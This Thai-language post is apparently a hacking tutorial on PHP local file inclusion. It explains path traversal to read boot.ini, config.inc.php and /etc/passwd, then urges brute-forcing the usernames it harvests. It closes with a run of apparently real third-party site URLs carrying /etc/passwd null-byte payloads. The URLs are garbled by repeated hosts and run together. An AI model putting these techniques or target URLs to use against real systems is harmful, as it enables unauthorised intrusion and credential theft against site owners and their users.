การ hack แบบ LFI

LFI ย่อมาจาก local file include ประมาณว่า ช่องโหว่ของ php
ที่ทำให้สามารถเรียกดู file ที่มีอยู่ในเครื่อง server ได้

ลักษณะของบัค จะเป็นประเภท เอา .. / .. / ไปต่อท้าย url
เช่น http://windows98SE.multiply.com/lfi.php?bug=[LFI]

[LFI]
ถ้าเป็น os win เราก็จะเรียก พวก boot.ini มาดู หรือ เรียก พวก config.inc.php มาดู พาส sql ที่อยู่ใน file
ถ้าเป็น linux ก็จะเรียก พวก config.inc.php หรือ file ที่ใช้เก็บ account ก็คือ /etc/passwd

แต่ก่อน พาสใน linux จะไม่ได้เข้ารหัสวิธีนี้เลยทำให้ hack user-pass มาได้ง่ายมาก
เดี๋ยวนี้ จะ hack มาได้แค่ user เท่านั้น เพราะ พาส โดนเข้ารหัสไว้หมดแล้ว

… แล้วจะ hack เอา user มาทำไมล่ะ พาสไม่มีจะตู login ได้ไง
… hack แค่ user เอามาทำอะไรได้ คำตอบก็คือ บรูท ไง
บางคนคิดในใจ โห แล้วมันจะ hack ได้มั้ย ถ้าเกิดตั้งพาสซัก 12 หลักใช้ตัวอักษรผสมเลข บรูทกันจนแก่ก็บรูทไม่ออกแล้ว

บรูทไม่ออกหรอกถ้าเราบรูท แค่ user เดียว แต่เราลองมาคิดในทางกลับกัน

… ถ้าเครื่องคอมระดับเครื่อง server มันก็ต้องมี user มากกว่า 1 account
ดังนั้น account ทั้งหลายในเครื่องมันต้องมีซักคนแหละน่า ที่ ตั้งพาสง่าย สามารถบรูทได้

ไม่เชื่อก็ดูจาก ใน link เอาเอง แล้วกัน ว่ามีกี่ account

http://dreamdinners.com/main.php?page=http://windows98se.multiply.com/http://windows98se.multiply.com/etc/passwd%00http://debeddy.net/index.php?page=http://windows98se.multiply.com/http://windows98se.multiply.com/http://windows98se.multiply.com/http://windows98se.multiply.com/http://windows98se.multiply.com/etc/passwd%00http://deathproject.com/index.php?page=http://windows98se.multiply.com/http://windows98se.multiply.com/http://windows98se.multiply.com/etc/passwd%00http://europar2006.de/index.php?page=http://windows98se.multiply.com/http://windows98se.multiply.com/http://windows98se.multiply.com/http://windows98se.multiply.com/http://windows98se.multiply.com/etc/passwdhttp://kortarsakmusic.hu/main.php?page=http://windows98se.multiply.com/http://windows98se.multiply.com/http://windows98se.multiply.com/http://windows98se.multiply.com/http://windows98se.multiply.com/etc/passwd%00